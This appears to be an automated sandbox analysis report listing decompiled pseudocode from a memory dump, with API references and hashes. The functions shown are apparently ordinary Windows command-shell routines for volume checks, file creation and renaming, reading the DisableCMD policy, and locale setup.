                                                      				__imp__GetVolumePathNameW(_t12,  &_v528, 0x104);
                                                      				if(_t12 != 0) {
                                                      					_t14 = GetDriveTypeW( &_v528);
                                                      					if(_t14 == 0 || _t14 == 4) {
                                                      						_t15 = 0;
                                                      					} else {
                                                      						if(GetVolumeInformationW( &_v528, 0, 0, 0,  &_v1052,  &_v1052,  &_v1048, 0x104) == 0) {
                                                      							goto L1;
                                                      						} else {
                                                      							_t22 =  &_v1048;
                                                      							__imp___wcsicmp(_t22, L"NTFS");
                                                      							asm("sbb eax, eax");
                                                      							_t15 =  ~_t22 + 1;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					_t15 = 1;
                                                      				}
                                                      				return E4A7313A9(_t15, _t24, _v8 ^ _t34, _t31, _t32, 0x104);
                                                      			}


















                                                      APIs
                                                      • GetVolumePathNameW.KERNEL32 ref: 4A751BF6
                                                      • GetDriveTypeW.KERNEL32(?), ref: 4A751C0C
                                                      • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000104), ref: 4A751C37
                                                      • _wcsicmp.MSVCRT ref: 4A751C4D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Volume$DriveInformationNamePathType_wcsicmp
                                                      • String ID: NTFS
                                                      • API String ID: 2534522608-1702600371
                                                      • Opcode ID: ba124278f670c82c161ac22f0a258b0dbadf72d6a782fd50f17bd39965d0c90e
                                                      • Instruction ID: c3a88aa4afb65aaef0f204c5ebaad302017663094af509faa6665e6011a34f97
                                                      • Opcode Fuzzy Hash: ba124278f670c82c161ac22f0a258b0dbadf72d6a782fd50f17bd39965d0c90e
                                                      • Instruction Fuzzy Hash: E8118AF36161186ADB64DBA0CC49DEA77BCDB06286F124575A506D2440EA30DA88CB74
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E4A74224D(void* __ecx, char _a4) {
                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                      				void* _t7;
                                                      				long _t8;
                                                      				signed int _t15;
                                                      				signed int _t16;
                                                      				void* _t18;
                                                      
                                                      				_t1 =  &_a4; // 0x4a74223d
                                                      				_v16.bInheritHandle = 1;
                                                      				_v16.lpSecurityDescriptor = 0;
                                                      				_v16.nLength = 0xc;
                                                      				_t7 = CreateFileW(E4A732598(__ecx,  *_t1), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
                                                      				_t18 = _t7;
                                                      				if(_t18 == 0xffffffff) {
                                                      					_t8 = GetLastError();
                                                      					 *0x4a754128 = _t8;
                                                      					if(_t8 == 0x6e) {
                                                      						 *0x4a754128 = 2;
                                                      					}
                                                      					_t16 = _t15 | 0xffffffff;
                                                      				} else {
                                                      					__imp___open_osfhandle(_t18, 8);
                                                      					_t16 = _t7;
                                                      					if(_t16 == 0xffffffff) {
                                                      						CloseHandle(_t18);
                                                      					}
                                                      				}
                                                      				return _t16;
                                                      			}










                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 4A742285
                                                      • _open_osfhandle.MSVCRT ref: 4A742299
                                                      • GetLastError.KERNEL32(?,4A74223D,?), ref: 4A749CCA
                                                      • CloseHandle.KERNEL32(00000000), ref: 4A749CED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandle
                                                      • String ID: ="tJ
                                                      • API String ID: 2775973614-3314973074
                                                      • Opcode ID: 520d55bb9dcb2db3c0170dbbbf679bf2b55625912b0854763443c1df965dc0f2
                                                      • Instruction ID: ee2d6b210eec3040104332abda63d71d30b68d1a16156d712db30b9d20a7b2d1
                                                      • Opcode Fuzzy Hash: 520d55bb9dcb2db3c0170dbbbf679bf2b55625912b0854763443c1df965dc0f2
                                                      • Instruction Fuzzy Hash: 920188B394A110AAD7305B65C80EB8E3FBDEB86376F124315E525D75C1DB704909C798
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A737B0D(void* __ecx, void* _a4) {
                                                      				int _v8;
                                                      				int _v12;
                                                      				long _t9;
                                                      				char* _t15;
                                                      
                                                      				_t15 = _a4;
                                                      				 *_t15 =  *_t15 & 0x00000000;
                                                      				_t9 = RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_a4);
                                                      				if(_t9 == 0) {
                                                      					_v8 = 4;
                                                      					RegQueryValueExW(_a4, L"DisableCMD", 0,  &_v12, _t15,  &_v8);
                                                      					_t9 = RegCloseKey(_a4);
                                                      				}
                                                      				return _t9;
                                                      			}








                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32 ref: 4A737B30
                                                      • RegQueryValueExW.KERNEL32(?,DisableCMD,00000000,?,?,?), ref: 4A737B54
                                                      • RegCloseKey.KERNEL32(?), ref: 4A737B5D
                                                      Strings
                                                      • Software\Policies\Microsoft\Windows\System, xrefs: 4A737B26
                                                      • DisableCMD, xrefs: 4A737B45
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                      • API String ID: 3677997916-1920437939
                                                      • Opcode ID: f74bff94fb5fb6803e6de94c28a107c2880a574bbd81cc4ec602ee01015233d6
                                                      • Instruction ID: 4ab7d2ce4f211352b8243210974a0b097311314ea92f2504220294380ec95f67
                                                      • Opcode Fuzzy Hash: f74bff94fb5fb6803e6de94c28a107c2880a574bbd81cc4ec602ee01015233d6
                                                      • Instruction Fuzzy Hash: C7F0FEF6501208BFEB208F80CC46FEA7FBCEB45795F114055FA05E6541E7B0AA44DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E4A731690() {
                                                      				struct HINSTANCE__* _t1;
                                                      
                                                      				if( *0x4a7540d4 == 0) {
                                                      					_t1 =  *0x4a754094; // 0xffffffff
                                                      					if(_t1 != 0xffffffff) {
                                                      						L5:
                                                      						if(_t1 != 0) {
                                                      							 *0x4a7540d4 = GetProcAddress(_t1, "SetThreadUILanguage");
                                                      						}
                                                      						L7:
                                                      						if( *0x4a7540d4 != 0) {
                                                      							goto L1;
                                                      						}
                                                      						return SetThreadLocale(0x409);
                                                      					}
                                                      					_t1 = GetModuleHandleW(L"KERNEL32.DLL");
                                                      					 *0x4a754094 = _t1;
                                                      					if(_t1 == 0xffffffff) {
                                                      						goto L7;
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				L1:
                                                      				return  *0x4a7540d4(0);
                                                      			}





                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,4A737336,00000000), ref: 4A738479
                                                      • GetProcAddress.KERNEL32(FFFFFFFF,SetThreadUILanguage,4A737336,00000000), ref: 4A738493
                                                      • SetThreadLocale.KERNEL32(00000409,4A737336,00000000), ref: 4A74418C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: AddressHandleLocaleModuleProcThread
                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                      • API String ID: 886074793-2530943252
                                                      • Opcode ID: e5a34d390274666e8ee6ff4ee8d54e0612c51cae7e3b0c5b972133eaac7541f0
                                                      • Instruction ID: 62105911e7d974335acfb971e0e6f5ce9e6610a8bffe1d92bbc53d76c1aa3b65
                                                      • Opcode Fuzzy Hash: e5a34d390274666e8ee6ff4ee8d54e0612c51cae7e3b0c5b972133eaac7541f0
                                                      • Instruction Fuzzy Hash: A2F0FEF054AA10EBEAF09F70890AB143FB96702366F234650E719D6DC2D7748858D714
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E4A74DF2B(signed int __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				short _v12;
                                                      				short _v14;
                                                      				char _v16;
                                                      				short _v536;
                                                      				short _v1056;
                                                      				short _v1574;
                                                      				char _v1576;
                                                      				char _v1580;
                                                      				signed int* _v1584;
                                                      				signed int _v1588;
                                                      				signed int* _v1592;
                                                      				signed int _v1596;
                                                      				intOrPtr _v1600;
                                                      				intOrPtr _v1604;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t108;
                                                      				intOrPtr _t110;
                                                      				intOrPtr* _t119;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				void* _t124;
                                                      				signed int* _t125;
                                                      				signed int _t126;
                                                      				short _t127;
                                                      				short _t128;
                                                      				short _t129;
                                                      				short _t130;
                                                      				intOrPtr* _t132;
                                                      				void* _t137;
                                                      				intOrPtr _t138;
                                                      				signed int _t140;
                                                      				signed int _t146;
                                                      				signed char* _t148;
                                                      				intOrPtr* _t156;
                                                      				signed int _t159;
                                                      				signed int _t169;
                                                      				signed int _t170;
                                                      				long _t174;
                                                      				signed int _t178;
                                                      				signed int* _t180;
                                                      				signed int _t181;
                                                      				signed int _t182;
                                                      				intOrPtr* _t188;
                                                      				intOrPtr _t192;
                                                      				signed int _t194;
                                                      				long _t198;
                                                      				signed int* _t203;
                                                      				signed int* _t204;
                                                      				void* _t208;
                                                      				signed int* _t210;
                                                      				signed int* _t217;
                                                      				signed int _t220;
                                                      				signed int _t221;
                                                      				void* _t225;
                                                      				intOrPtr* _t227;
                                                      				signed int _t229;
                                                      				intOrPtr* _t231;
                                                      				signed int _t237;
                                                      				signed int _t239;
                                                      				signed int _t240;
                                                      				void* _t241;
                                                      				signed int* _t242;
                                                      				signed int* _t244;
                                                      				signed int _t247;
                                                      				signed int _t253;
                                                      
                                                      				_t240 = __edx;
                                                      				_t108 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t108 ^ _t253;
                                                      				_t110 = _a4;
                                                      				_t245 = 0;
                                                      				_push(0);
                                                      				_v1604 = _t110;
                                                      				L4A731BC7();
                                                      				_t219 = 0x4a754ac0;
                                                      				if(_t110 == 0) {
                                                      					_t244 = E4A7322CA( *((intOrPtr*)(_v1604 + 0x3c)), 0, 0);
                                                      					_v1584 = _t244;
                                                      					_t217 = E4A73413B(_t244);
                                                      					_v1592 = _t217;
                                                      					__eflags =  *_t244;
                                                      					if( *_t244 == 0) {
                                                      						L30:
                                                      						_push(0x232a);
                                                      						L11:
                                                      						L4A74DF02(_t219, _t240);
                                                      						L12:
                                                      						E4A73185A( &_v536, 0x104, 0x4a755260);
                                                      						E4A73185A( &_v1056, 0x104, 0x4a755260);
                                                      						_t119 =  &_v536;
                                                      						_t240 = _t119 + 2;
                                                      						do {
                                                      							_t220 =  *_t119;
                                                      							_t119 = _t119 + 2;
                                                      							__eflags = _t220;
                                                      						} while (_t220 != 0);
                                                      						_t219 = _t217[6];
                                                      						_t122 = _t119 - _t240 >> 1;
                                                      						__eflags =  *_t219 & 0x00000010;
                                                      						_v1588 = _t122;
                                                      						if(( *_t219 & 0x00000010) != 0) {
                                                      							_t123 = _t122 - 1;
                                                      							_v1588 = _t123;
                                                      							_t124 = _t123 + _t123;
                                                      							_t219 = 0;
                                                      							__eflags = 0;
                                                      							 *((short*)(_t253 + _t124 - 0x214)) = 0;
                                                      							 *((short*)(_t253 + _t124 - 0x41c)) = 0;
                                                      						} else {
                                                      							E4A7320A9(0x4a755260,  &_v536, 0x104, _t217[4]);
                                                      						}
                                                      						__eflags = _t217[7] & 0x00000008;
                                                      						if((_t217[7] & 0x00000008) != 0) {
                                                      							L20:
                                                      							_t125 = _v1592;
                                                      							__eflags =  *((short*)(_t125 + 2)) - 0x3a;
                                                      							if( *((short*)(_t125 + 2)) == 0x3a) {
                                                      								goto L30;
                                                      							}
                                                      							_t219 =  *0x4a770664 & 0x0000ffff;
                                                      							_t126 = E4A7318EB(_t125,  *0x4a770664 & 0x0000ffff);
                                                      							__eflags = _t126;
                                                      							if(_t126 != 0) {
                                                      								goto L30;
                                                      							}
                                                      							_t127 =  *0x4a755260; // 0x0
                                                      							_v1576 = _t127;
                                                      							_t128 = 0x3a;
                                                      							_v1574 = _t128;
                                                      							_t129 = 0x2a;
                                                      							_v16 = _t129;
                                                      							_t130 = 0x3f;
                                                      							_v14 = _t130;
                                                      							__eflags = 0;
                                                      							_v12 = 0;
                                                      							_t132 = _v1584;
                                                      							_t240 = _t132 + 2;
                                                      							do {
                                                      								_t221 =  *_t132;
                                                      								_t132 = _t132 + 2;
                                                      								__eflags = _t221;
                                                      							} while (_t221 != 0);
                                                      							_t247 = _t132 - _t240 >> 1;
                                                      							_t137 = E4A731996(_v1584,  &_v16);
                                                      							__eflags = _t137 - _t247;
                                                      							_t138 = 0x20;
                                                      							_v1600 = _t138;
                                                      							asm("sbb esi, esi");
                                                      							_t245 =  ~_t247;
                                                      							_t140 = E4A733117( &_v536, _t138, _t217[6],  &_v1580);
                                                      							__eflags = _t140;
                                                      							if(_t140 != 0) {
                                                      								L31:
                                                      								_t219 = 0;
                                                      								_t52 =  &_v1596;
                                                      								 *_t52 = _v1596 & 0;
                                                      								__eflags =  *_t52;
                                                      								 *(_t253 + _v1588 * 2 - 0x214) = 0;
                                                      								while(1) {
                                                      									__eflags =  *0x4a7541b4;
                                                      									if( *0x4a7541b4 != 0) {
                                                      										break;
                                                      									}
                                                      									_t148 = _t217[6];
                                                      									__eflags =  *_t148 & 0x00000010;
                                                      									if(( *_t148 & 0x00000010) == 0) {
                                                      										_t245 = _t253 + _v1588 * 2 - 0x214;
                                                      										 *(_t253 + _v1588 * 2 - 0x214) = 0;
                                                      										__eflags = _t217[6] + 0x2c;
                                                      										E4A7320A9(_t253 + _v1588 * 2 - 0x214,  &_v536, 0x104, _t217[6] + 0x2c);
                                                      										E4A741D9B(_t219,  &_v1576, 0x104, _v1592, _t253 + _v1588 * 2 - 0x214);
                                                      										_t156 =  &_v1576;
                                                      										_t225 = _t156 + 2;
                                                      										do {
                                                      											_t240 =  *_t156;
                                                      											_t156 = _t156 + 2;
                                                      											__eflags = _t240;
                                                      										} while (_t240 != 0);
                                                      										_t219 = _v1588;
                                                      										_t159 = _t156 - _t225 >> 1;
                                                      										__eflags = _t219 + _t159 + 1 - 0x104;
                                                      										if(_t219 + _t159 + 1 > 0x104) {
                                                      											L55:
                                                      											E4A732F5C(_v1580);
                                                      											E4A73963C();
                                                      											_push(0x232e);
                                                      											goto L11;
                                                      										}
                                                      										__eflags = 0;
                                                      										 *((short*)(_t253 + _t219 * 2 - 0x41c)) = 0;
                                                      										E4A7320A9(_t245,  &_v1056, 0x104,  &_v1576);
                                                      										L47:
                                                      										_t169 = MoveFileW( &_v536,  &_v1056);
                                                      										__eflags = _t169;
                                                      										if(_t169 == 0) {
                                                      											_t174 = GetLastError();
                                                      											__eflags = _t174 - 0xb7;
                                                      											if(_t174 == 0xb7) {
                                                      												_t174 = 0x234d;
                                                      											}
                                                      											_push(0);
                                                      											_v1596 = _t174;
                                                      											E4A736D44(_t219);
                                                      											_t219 = _t174;
                                                      										}
                                                      										_t170 = E4A7395F8(_t217[6], _v1600, _v1580);
                                                      										__eflags = _t170;
                                                      										if(_t170 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											E4A732F5C(_v1580);
                                                      											E4A73963C();
                                                      											__eflags = _v1596;
                                                      											_t104 = _v1596 != 0;
                                                      											__eflags = _t104;
                                                      											_t146 = 0 | _t104;
                                                      											L53:
                                                      											return E4A7313A9(_t146, _t217, _v8 ^ _t253, _t240, 0x104, _t245);
                                                      										}
                                                      									}
                                                      									_t178 = E4A732148( &_v1056,  *0x4a770664 & 0x0000ffff);
                                                      									__eflags = _t178;
                                                      									if(_t178 == 0) {
                                                      										goto L55;
                                                      									}
                                                      									_t180 = _t178 + 2;
                                                      									__eflags = 0;
                                                      									 *_t180 = 0;
                                                      									_t227 = _v1592;
                                                      									_v1584 = _t180;
                                                      									_t241 = _t227 + 2;
                                                      									do {
                                                      										_t181 =  *_t227;
                                                      										_t227 = _t227 + 2;
                                                      										__eflags = _t181;
                                                      									} while (_t181 != 0);
                                                      									_t229 = _t227 - _t241;
                                                      									__eflags = _t229;
                                                      									_t182 = _t229 >> 1;
                                                      									_t231 =  &_v1056;
                                                      									_t245 = _t231 + 2;
                                                      									do {
                                                      										_t240 =  *_t231;
                                                      										_t231 = _t231 + 2;
                                                      										__eflags = _t240;
                                                      									} while (_t240 != 0);
                                                      									_t219 = _t231 - _t245 >> 1;
                                                      									__eflags = _t219 + _t182 + 1 - 0x104;
                                                      									if(_t219 + _t182 + 1 > 0x104) {
                                                      										goto L55;
                                                      									}
                                                      									__eflags = 0x104 - (_v1584 -  &_v1056 >> 1);
                                                      									E4A73185A(_v1584, 0x104 - (_v1584 -  &_v1056 >> 1), _v1592);
                                                      									_t188 =  &_v1056;
                                                      									_t240 = _t188 + 2;
                                                      									do {
                                                      										_t237 =  *_t188;
                                                      										_t188 = _t188 + 2;
                                                      										__eflags = _t237;
                                                      									} while (_t237 != 0);
                                                      									_t219 = 0;
                                                      									 *((short*)(_t253 + (_t188 - _t240 >> 1) * 2 - 0x41c)) = 0;
                                                      									goto L47;
                                                      								}
                                                      								E4A732F5C(_v1580);
                                                      								E4A73963C();
                                                      								goto L1;
                                                      							}
                                                      							_t192 = 0x10;
                                                      							_t219 =  &_v1580;
                                                      							_v1600 = _t192;
                                                      							_t194 = E4A733117( &_v536, _t192, _t217[6],  &_v1580);
                                                      							__eflags = _t194;
                                                      							if(_t194 != 0) {
                                                      								__eflags = _t245;
                                                      								if(_t245 == 0) {
                                                      									goto L31;
                                                      								}
                                                      								E4A732F5C(_v1580);
                                                      								goto L30;
                                                      							}
                                                      							__eflags =  *0x4a754128 - 0x12;
                                                      							if( *0x4a754128 == 0x12) {
                                                      								 *0x4a754128 = 2;
                                                      							}
                                                      							L10:
                                                      							_push( *0x4a754128);
                                                      						} else {
                                                      							_t198 = GetFileAttributesW(E4A732598(_t219,  &_v536));
                                                      							_t219 = _t217[6];
                                                      							 *(_t217[6]) = _t198;
                                                      							__eflags =  *(_t217[6]) - 0xffffffff;
                                                      							if( *(_t217[6]) != 0xffffffff) {
                                                      								goto L20;
                                                      							}
                                                      							_push(GetLastError());
                                                      						}
                                                      						goto L11;
                                                      					}
                                                      					__eflags =  *_t217;
                                                      					if( *_t217 == 0) {
                                                      						goto L30;
                                                      					}
                                                      					_t203 = E4A73413B(_t217);
                                                      					__eflags =  *_t203;
                                                      					if( *_t203 != 0) {
                                                      						goto L30;
                                                      					}
                                                      					_t204 = _t244;
                                                      					_t8 =  &(_t204[0]); // 0x2
                                                      					_t242 = _t8;
                                                      					do {
                                                      						_t239 =  *_t204;
                                                      						_t204 =  &(_t204[0]);
                                                      						__eflags = _t239;
                                                      					} while (_t239 != 0);
                                                      					_t208 = E4A732598(_t239, _t244);
                                                      					__eflags = (_t204 - _t242 >> 1) + 1;
                                                      					E4A73185A(_t244, (_t204 - _t242 >> 1) + 1, _t208);
                                                      					_t210 = _t217;
                                                      					_t9 =  &(_t210[0]); // 0x2
                                                      					_t219 = _t9;
                                                      					do {
                                                      						_t240 =  *_t210;
                                                      						_t210 =  &(_t210[0]);
                                                      						__eflags = _t240;
                                                      					} while (_t240 != 0);
                                                      					E4A73185A(_t217, (_t210 - _t219 >> 1) + 1, E4A732598(_t219, _t217));
                                                      					_t217 = E4A739662(_t219, _t240, __eflags, _t244);
                                                      					__eflags = _t217 - 1;
                                                      					if(_t217 != 1) {
                                                      						goto L12;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      				L1:
                                                      				_t146 = 1;
                                                      				goto L53;
                                                      			}

                                                      APIs
                                                      • _setjmp3.MSVCRT ref: 4A74DF54
                                                      • GetFileAttributesW.KERNEL32(00000000,?,?,00000104,?,?,00000104,4A755260,?,00000104,4A755260,00000010,?,?,?,00000020), ref: 4A74E099
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: AttributesFile_setjmp3
                                                      • String ID:
                                                      • API String ID: 4095645427-0
                                                      • Opcode ID: 42b508e09fe19597365abdd882e3dae19c4a4bd096b23d0fa3060b881fb96443
                                                      • Instruction ID: 4903949e3e1c1169a5a9d75ac4ec0a4dabf9ac7f37dddff57b81a9c6dd9f112d
                                                      • Opcode Fuzzy Hash: 42b508e09fe19597365abdd882e3dae19c4a4bd096b23d0fa3060b881fb96443
                                                      • Instruction Fuzzy Hash: 47C1447290551ADADF309F64CD88EEA7BB9EF44320F0140E5E949DB152EB319A89CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E4A73DEBE(WCHAR** _a4) {
                                                      				signed int _v8;
                                                      				char _v72;
                                                      				WCHAR* _v76;
                                                      				long _v80;
                                                      				LPWSTR* _v84;
                                                      				signed int _v88;
                                                      				LPWSTR* _v92;
                                                      				long _v96;
                                                      				LPWSTR* _v100;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t86;
                                                      				LPWSTR* _t88;
                                                      				signed int _t89;
                                                      				intOrPtr _t92;
                                                      				WCHAR** _t93;
                                                      				signed char _t95;
                                                      				wchar_t* _t96;
                                                      				wchar_t* _t98;
                                                      				long _t101;
                                                      				intOrPtr _t109;
                                                      				WCHAR** _t112;
                                                      				intOrPtr _t116;
                                                      				WCHAR* _t117;
                                                      				WCHAR* _t118;
                                                      				WCHAR* _t119;
                                                      				WCHAR* _t122;
                                                      				long _t123;
                                                      				short* _t124;
                                                      				LPWSTR* _t126;
                                                      				WCHAR** _t129;
                                                      				WCHAR** _t139;
                                                      				void* _t141;
                                                      				intOrPtr _t142;
                                                      				WCHAR** _t143;
                                                      				WCHAR* _t146;
                                                      				signed int _t148;
                                                      				signed int _t151;
                                                      				long _t153;
                                                      				WCHAR** _t155;
                                                      				signed int _t160;
                                                      				void* _t161;
                                                      				void* _t164;
                                                      				intOrPtr _t171;
                                                      
                                                      				_t86 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t86 ^ _t160;
                                                      				_t158 = _a4;
                                                      				_t148 = 1;
                                                      				_v88 = 0;
                                                      				_v84 = 0;
                                                      				 *0x4a7540cc = 0;
                                                      				_v100 = 1;
                                                      				_t88 = E4A731896(0x24);
                                                      				_v92 = _t88;
                                                      				if(_t88 == 0) {
                                                      					L24:
                                                      					_t89 = _t148;
                                                      					L18:
                                                      					return E4A7313A9(_t89, 0, _v8 ^ _t160, _t144, _t148, _t158);
                                                      				}
                                                      				_t139 =  *0x4a7540bc; // 0x0
                                                      				if(_t139 == 0) {
                                                      					 *0x4a7540bc = E4A731896(4);
                                                      					_t92 = E4A731896(4);
                                                      					L5:
                                                      					 *0x4a7540c0 = _t92;
                                                      					_t93 =  *0x4a7540bc; // 0x0
                                                      					if(_t93 == 0) {
                                                      						goto L24;
                                                      					}
                                                      					_t171 =  *0x4a7540c0; // 0x0
                                                      					if(_t171 == 0) {
                                                      						goto L24;
                                                      					}
                                                      					_t141 = _v88 + _v88;
                                                      					 *((short*)(_t141 + _t93)) = _t158[0x11];
                                                      					_t144 =  *0x4a7540bc; // 0x0
                                                      					 *((short*)(_t141 +  &(_t144[0]))) = 0;
                                                      					_t95 = _t158[0x12];
                                                      					if((_t95 & 0x00000001) != 0) {
                                                      						_t96 = E4A7322CA(_t158[0xf], 0, 0);
                                                      						_v76 = _t96;
                                                      						_v80 = wcstol(_t96, 0, 0);
                                                      						_t98 = E4A73413B(_v76);
                                                      						_v76 = _t98;
                                                      						_v96 = wcstol(_t98, 0, 0);
                                                      						_t101 = wcstol(E4A73413B(_v76), 0, 0);
                                                      						_t164 = _t161 + 0x24;
                                                      						_v76 = _t101;
                                                      						_v92 = 0;
                                                      						while(1) {
                                                      							__eflags = _v96;
                                                      							if(_v96 < 0) {
                                                      								goto L30;
                                                      							}
                                                      							_t102 = _v76;
                                                      							__eflags = _v80 - _v76;
                                                      							if(_v80 > _v76) {
                                                      								L11:
                                                      								_t148 = _v88;
                                                      								if(_t148 == 0) {
                                                      									 *0x4a7540bc = 0;
                                                      									 *0x4a7540c0 = 0;
                                                      									L17:
                                                      									_t89 = _v84;
                                                      									goto L18;
                                                      								}
                                                      								_t143 =  *0x4a7540bc; // 0x0
                                                      								if(_t143 == 0) {
                                                      									__eflags =  *_t143;
                                                      									if( *_t143 != 0) {
                                                      										goto L13;
                                                      									}
                                                      									L16:
                                                      									_t116 =  *0x4a7540c0; // 0x0
                                                      									 *((intOrPtr*)(_t116 + _t148 * 4)) = 0;
                                                      									goto L17;
                                                      								}
                                                      								L13:
                                                      								_t112 = _t143;
                                                      								_t26 =  &(_t112[0]); // 0x2
                                                      								_t158 = _t26;
                                                      								do {
                                                      									_t146 =  *_t112;
                                                      									_t112 =  &(_t112[0]);
                                                      								} while (_t146 != 0);
                                                      								_t144 = 0;
                                                      								 *((short*)(_t143 + (_t112 - _t158 >> 1) * 2 - 2)) = 0;
                                                      								goto L16;
                                                      							}
                                                      							L27:
                                                      							E4A734B2A(E4A73DFFF(_t102));
                                                      							E4A73179D( &_v72, 0x20, E4A735104, _v80);
                                                      							_t142 =  *0x4a7540c0; // 0x0
                                                      							_t164 = _t164 + 0x10;
                                                      							_t151 = _v88 << 2;
                                                      							 *((intOrPtr*)(_t151 + _t142)) =  &_v72;
                                                      							_v84 = E4A73DBCE(0, _t144, _t151, _t158[0x10], _v100);
                                                      							_t109 =  *0x4a7540c0; // 0x0
                                                      							 *((intOrPtr*)(_t151 + _t109)) = 0;
                                                      							_v92 = E4A73DC07(_v92);
                                                      							_v80 = _v80 + _v96;
                                                      							_v100 = 0;
                                                      							continue;
                                                      							L30:
                                                      							_t102 = _v80;
                                                      							__eflags = _v80 - _v76;
                                                      							if(_v80 >= _v76) {
                                                      								goto L27;
                                                      							}
                                                      							goto L11;
                                                      						}
                                                      					}
                                                      					_t173 = _t95 & 0x00000008;
                                                      					if((_t95 & 0x00000008) == 0) {
                                                      						__eflags = _t95 & 0x00000004;
                                                      						if((_t95 & 0x00000004) != 0) {
                                                      							_t117 = _t158[0x13];
                                                      							__eflags = _t117;
                                                      							if(_t117 == 0) {
                                                      								_t117 = 0x4a744cac;
                                                      							}
                                                      							_t118 = E4A732598(_t141, _t117);
                                                      							_v80 = _t118;
                                                      							_t119 = GetFullPathNameW(_t118, 0, 0, 0);
                                                      							_v96 = _t119;
                                                      							__eflags = _t119;
                                                      							if(_t119 == 0) {
                                                      								L42:
                                                      								_t158 = 1;
                                                      								E4A736D44(_t141, 0x400023d9, 1, _v80);
                                                      								_v84 = 1;
                                                      							} else {
                                                      								_t122 = E4A731896(_t119 +  &(_t119[1]));
                                                      								_v76 = _t122;
                                                      								__eflags = _t122;
                                                      								if(_t122 != 0) {
                                                      									_t123 = GetFullPathNameW(_v80, _v96, _t122, 0);
                                                      									__eflags = _t123;
                                                      									if(_t123 == 0) {
                                                      										goto L42;
                                                      									}
                                                      									_t153 = _v96;
                                                      									__eflags = _t123 - _t153;
                                                      									if(_t123 >= _t153) {
                                                      										goto L42;
                                                      									}
                                                      									_t124 = E4A732ED1(_v76);
                                                      									__eflags =  *_t124 - 0x5c;
                                                      									if( *_t124 != 0x5c) {
                                                      										__eflags = _t153 + 1;
                                                      										E4A7320A9(_t158, _v76, _t153 + 1, E4A732EC8);
                                                      									}
                                                      									_t126 = E4A74BF0C(_v76, _t158, _v92, _v88, E4A7322CA(_t158[0xf], 0, 0));
                                                      									L10:
                                                      									_v84 = _t126;
                                                      									goto L11;
                                                      								}
                                                      								_v84 = 1;
                                                      							}
                                                      							goto L11;
                                                      						}
                                                      						_t126 = E4A73E342(_t158, _v92, _v88, E4A7322CA(_t158[0xf], 0, 0), _t148);
                                                      						goto L10;
                                                      					}
                                                      					_t126 = E4A73E46C(_t173, _t158, _v88, _t148);
                                                      					goto L10;
                                                      				}
                                                      				_t129 = _t139;
                                                      				_t7 =  &(_t129[0]); // 0x2
                                                      				_t155 = _t7;
                                                      				do {
                                                      					_t144 =  *_t129;
                                                      					_t129 =  &(_t129[0]);
                                                      				} while (_t144 != 0);
                                                      				_t9 = (_t129 - _t155 >> 1) + 4; // 0x6
                                                      				_v88 = _t129 - _t155 >> 1;
                                                      				 *0x4a7540bc = E4A732536(_t139, (_t129 - _t155 >> 1) + _t9);
                                                      				_t92 = E4A732536( *0x4a7540c0, 4 + (_t129 - _t155 >> 1) * 4);
                                                      				_t148 = 1;
                                                      				goto L5;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
